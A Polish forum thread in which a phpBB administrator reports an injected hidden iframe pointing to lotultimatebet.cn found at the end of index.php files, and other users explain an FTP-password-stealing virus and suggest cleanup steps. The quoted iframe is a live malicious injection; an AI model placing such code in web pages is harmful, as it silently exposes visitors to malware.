Exploit na forum, co robić

[gracjan]

Dziś rano po wejściu na forum zauważyłem problemy z grafiką, mega duże litery i nad logo pojawiły się takie rzeczy:

Kod: Zaznacz cały

[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3545: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3547: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3548: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3549: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)

Po wejściu na ftp i sprawdzeniu pliku index.php zauważyłem że na końcu kodu pojawiło się takie coś:

Kod: Zaznacz cały

<iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe>

Jak ładuje się strona to tak jakby ładowała się strona lotultimatebet.cn


Co robić??

[ania07]

Forum nie jest zhakowane, to jest wirus którego trzeba usunąć.

[gracjan]

Właśnie pousuwałem

Kod: Zaznacz cały

<iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe>

z każdego pliku index.* i chyba pomogło, jeśli trzeba coś jeszcze zrobić to dajcie znać

[ania07]

przeskanuj koniecznie system jakimś programem antywirusowym.

[gracjan]

Przeskanowałem dyski NODem i nic nie wykazało

[ania07]

No to gitarra

[wiesieks]

Dodatkowo radzę pozmieniać hasło dostępu do ftp, skoro kod dostał się do index.php prawdopodobnie zostało ono złamane - no chyba , że samemu go niechcący dodałeś

[daroPL]

we3b już kiedyś o tego rodzaju problemie pisał. Jest to wirus, który „dokleja” się do klienta FTP. Kradnie hasła i dodaje czasami do plików jakiś tekst/reklamę.

[jaroslw]

Złośliwy kod na forum
Ostatnimi czasy wiele witryn (w tym także forów phpBB) zostało dotknięte wirusem, który
dokleja własny kod do plików. Pierwsze wersje wirusa współpracowały wyłącznie z
programem Total Commander. Nowsze generacje działają już z większością popularnych
klientów FTP. Wirus podsłuchuje ruch w sieci oraz przechwytuje hasła do kont FTP.
Następnie loguje się na konta i dokleja własny kod JavaScript. Najczęściej ląduje on w plikach
index.*.

W wypadku zainfekowania systemu należy go przeskanować dobrym antywirusem, a
następnie przejrzeć pliki forum i porównać z tymi z oficjalnej paczki phpBB. Najlepszą
ochroną przed wirusem jest nie zapisywanie haseł w programach do obsługi połączeń FTP.

[gracjan]

Kurde, pokasowałem te doklejone kody, po kilku godzinach znowu to samo :/ jak się mogę zabezpieczyć?? Pozmieniałem hasła, przeskanowałem kompa i nic, dalej to samo...

[pit]

Przeskanuj się czymś na "spyware/addware", wywal wszystko z documents and settings\gracjan\ustawienia lokalne\temp, i temporary internet files nie używaj IE.

[jaroslw]

Prawdopodobnie wirus dobrze się zamaskował. Mało informacji jest jeszcze na jego temat.

Z jakiego klienta FTP korzystasz?

[matius71]

najpierw usunąć wirka a potem zmienić hasło do ftp czy odwrotnie? Pytam bo jak sprytny wirek to jest chyba spora różnica?

[jaroslw]

Hasło i tak najprawdopodobniej zmieniasz przez panel administracji kontem hostingowym. Myślę, że tego już wirus nie przechwyci. Nie zapisuj nowego hasła w kliencie FTP do czasu usunięcia wirusa (na razie najlepiej w ogóle nie zapisuj w nim haseł ani loginów).

[gracjan]

Korzystam z Total Commandera, pousuwałem to gówno z plików index na serwerze, zmieniłem hasło, ale niektórym znajomym nadal podaje że w chwili wejścia na strone/forum atakuje ich trojan na dole w pasku w chwili ładowania wyskakuje jeszcze nadal adres tamtej strony tak jakby się ładowało poprzez tamtą stronę, alias albo coś podobnego (nie znam się)

W każdym bądź razie po tych czynnościach forum działa bez zarzutów tylko niektórym pojawia się trojan i ładuje się poprzez tamtą stronę.

Jakby co to piszcie tu wasze problemy z tym badziewiem i wasze podpowiedzi co z tym robić...